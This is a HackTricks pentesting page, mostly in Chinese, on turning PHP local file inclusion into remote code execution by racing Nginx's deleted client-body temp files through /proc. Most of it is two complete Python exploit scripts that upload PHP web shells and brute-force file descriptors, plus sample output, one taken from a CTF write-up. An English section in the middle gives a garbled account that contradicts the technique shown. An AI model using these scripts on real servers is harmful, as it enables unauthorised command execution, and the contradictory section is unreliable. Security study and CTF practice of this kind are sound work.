hacktricks/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
2023-08-03 19:12:22 +00:00

13 KiB
Raw Blame History

通过Nginx临时文件的LFI2RCE

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 YouTube 🎥

可漏洞的配置

  • PHP代码
<?php include_once($_GET['file']);
  • FPM / PHP 配置:
...
php_admin_value[session.upload_progress.enabled] = 0
php_admin_value[file_uploads] = 0
...
  • 设置/加固:
...
chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
...

幸运的是PHP目前经常通过PHP-FPM和Nginx部署。Nginx提供了一个容易被忽视的客户端主体缓冲功能如果客户端主体不仅限于POST大于某个阈值它将写入临时文件。

如果Nginx以与PHP相同的用户通常是www-data运行此功能允许利用LFI而无需创建其他文件。

相关的Nginx代码

ngx_fd_t
ngx_open_tempfile(u_char *name, ngx_uint_t persistent, ngx_uint_t access)
{
ngx_fd_t  fd;

fd = open((const char *) name, O_CREAT|O_EXCL|O_RDWR,
access ? access : 0600);

if (fd != -1 && !persistent) {
(void) unlink((const char *) name);
}

return fd;
}

这里可以看到Nginx在打开临时文件后立即将其删除。幸运的是可以利用procfs通过竞争仍然获取到已删除文件的引用

...
/proc/34/fd:
total 0
lrwx------ 1 www-data www-data 64 Dec 25 23:56 0 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589]
lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926]
lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
...

注意:在这个例子中,不能直接包含/proc/34/fd/15因为PHP的include函数会将路径解析为/var/lib/nginx/body/0000001368 (deleted),而这个文件在文件系统中不存在。幸运的是,可以通过一些间接的方式绕过这个小限制,比如:/proc/self/fd/34/../../../34/fd/15,最终会执行被删除的/var/lib/nginx/body/0000001368文件的内容。

完整的利用方式

#!/usr/bin/env python3
import sys, threading, requests

# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance
# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details

URL = f'http://{sys.argv[1]}:{sys.argv[2]}/'

# find nginx worker processes
r  = requests.get(URL, params={
'file': '/proc/cpuinfo'
})
cpus = r.text.count('processor')

r  = requests.get(URL, params={
'file': '/proc/sys/kernel/pid_max'
})
pid_max = int(r.text)
print(f'[*] cpus: {cpus}; pid_max: {pid_max}')

nginx_workers = []
for pid in range(pid_max):
r  = requests.get(URL, params={
'file': f'/proc/{pid}/cmdline'
})

if b'nginx: worker process' in r.content:
print(f'[*] nginx worker found: {pid}')

nginx_workers.append(pid)
if len(nginx_workers) >= cpus:
break

done = False

# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
def uploader():
print('[+] starting uploader')
while not done:
requests.get(URL, data='<?php system($_GET["c"]); /*' + 16*1024*'A')

for _ in range(16):
t = threading.Thread(target=uploader)
t.start()

# brute force nginx's fds to include body files via procfs
# use ../../ to bypass include's readlink / stat problems with resolving fds to `/var/lib/nginx/body/0000001150 (deleted)`
def bruter(pid):
global done

while not done:
print(f'[+] brute loop restarted: {pid}')
for fd in range(4, 32):
f = f'/proc/self/fd/{pid}/../../../{pid}/fd/{fd}'
r  = requests.get(URL, params={
'file': f,
'c': f'id'
})
if r.text:
print(f'[!] {f}: {r.text}')
done = True
exit()

for pid in nginx_workers:
a = threading.Thread(target=bruter, args=(pid, ))
a.start()

LFI to RCE via Nginx Temp Files

Introduction

In some cases, a Local File Inclusion (LFI) vulnerability can be escalated to Remote Code Execution (RCE) by exploiting Nginx temporary files. This technique can be used when the target server is running Nginx as its web server.

Exploitation

  1. Identify the LFI vulnerability on the target website.
  2. Determine the location of the Nginx temporary directory. This can usually be found in the Nginx configuration file (nginx.conf).
  3. Craft a payload that will write a malicious PHP file to the Nginx temporary directory. For example:
<?php echo system($_GET['cmd']); ?>
  1. Use the LFI vulnerability to include the crafted payload into a PHP file on the target server.
  2. Trigger the inclusion of the PHP file containing the payload.
  3. The payload will write the malicious PHP file to the Nginx temporary directory.
  4. Execute the payload by accessing the malicious PHP file through the web server. For example:
http://target.com/nginx_temp/malicious.php?cmd=whoami

Mitigation

To prevent this type of attack, it is recommended to:

  • Regularly update Nginx to the latest version.
  • Restrict access to the Nginx temporary directory.
  • Implement input validation and sanitization to prevent LFI vulnerabilities.
  • Use a Web Application Firewall (WAF) to detect and block malicious requests.

Conclusion

Exploiting Nginx temporary files can allow an attacker to escalate an LFI vulnerability to RCE. It is important for web administrators to be aware of this technique and take appropriate measures to secure their servers.

$ ./pwn.py 127.0.0.1 1337
[*] cpus: 2; pid_max: 32768
[*] nginx worker found: 33
[*] nginx worker found: 34
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] brute loop restarted: 33
[+] brute loop restarted: 34
[!] /proc/self/fd/34/../../../34/fd/9: uid=33(www-data) gid=33(www-data) groups=33(www-data)

另一个漏洞利用

这是来自https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/的内容。

import requests
import threading
import multiprocessing
import threading
import random

SERVER = "http://localhost:8088"
NGINX_PIDS_CACHE = set([34, 35, 36, 37, 38, 39, 40, 41])
# Set the following to True to use the above set of PIDs instead of scanning:
USE_NGINX_PIDS_CACHE = False

def create_requests_session():
session = requests.Session()
# Create a large HTTP connection pool to make HTTP requests as fast as possible without TCP handshake overhead
adapter = requests.adapters.HTTPAdapter(pool_connections=1000, pool_maxsize=10000)
session.mount('http://', adapter)
return session

def get_nginx_pids(requests_session):
if USE_NGINX_PIDS_CACHE:
return NGINX_PIDS_CACHE
nginx_pids = set()
# Scan up to PID 200
for i in range(1, 200):
cmdline = requests_session.get(SERVER + f"/?action=read&file=/proc/{i}/cmdline").text
if cmdline.startswith("nginx: worker process"):
nginx_pids.add(i)
return nginx_pids

def send_payload(requests_session, body_size=1024000):
try:
# The file path (/bla) doesn't need to exist - we simply need to upload a large body to Nginx and fail fast
payload = '<?php system("/readflag"); ?> //'
requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
except:
pass

def send_payload_worker(requests_session):
while True:
send_payload(requests_session)

def send_payload_multiprocess(requests_session):
# Use all CPUs to send the payload as request body for Nginx
for _ in range(multiprocessing.cpu_count()):
p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))
p.start()

def generate_random_path_prefix(nginx_pids):
# This method creates a path from random amount of ProcFS path components. A generated path will look like /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root
path = ""
component_num = random.randint(0, 10)
for _ in range(component_num):
pid = random.choice(nginx_pids)
if random.randint(0, 1) == 0:
path += f"/proc/{pid}/cwd"
else:
path += f"/proc/{pid}/root"
return path

def read_file(requests_session, nginx_pid, fd, nginx_pids):
nginx_pid_list = list(nginx_pids)
while True:
path = generate_random_path_prefix(nginx_pid_list)
path += f"/proc/{nginx_pid}/fd/{fd}"
try:
d = requests_session.get(SERVER + f"/?action=include&file={path}").text
except:
continue
# Flags are formatted as hxp{<flag>}
if "hxp" in d:
print("Found flag! ")
print(d)

def read_file_worker(requests_session, nginx_pid, nginx_pids):
# Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this range
for fd in range(10, 45):
thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids))
thread.start()

def read_file_multiprocess(requests_session, nginx_pids):
for nginx_pid in nginx_pids:
p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
p.start()

if __name__ == "__main__":
print('[DEBUG] Creating requests session')
requests_session = create_requests_session()
print('[DEBUG] Getting Nginx pids')
nginx_pids = get_nginx_pids(requests_session)
print(f'[DEBUG] Nginx pids: {nginx_pids}')
print('[DEBUG] Starting payload sending')
send_payload_multiprocess(requests_session)
print('[DEBUG] Starting fd readers')
read_file_multiprocess(requests_session, nginx_pids)

实验室

参考资料

☁️ HackTricks 云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥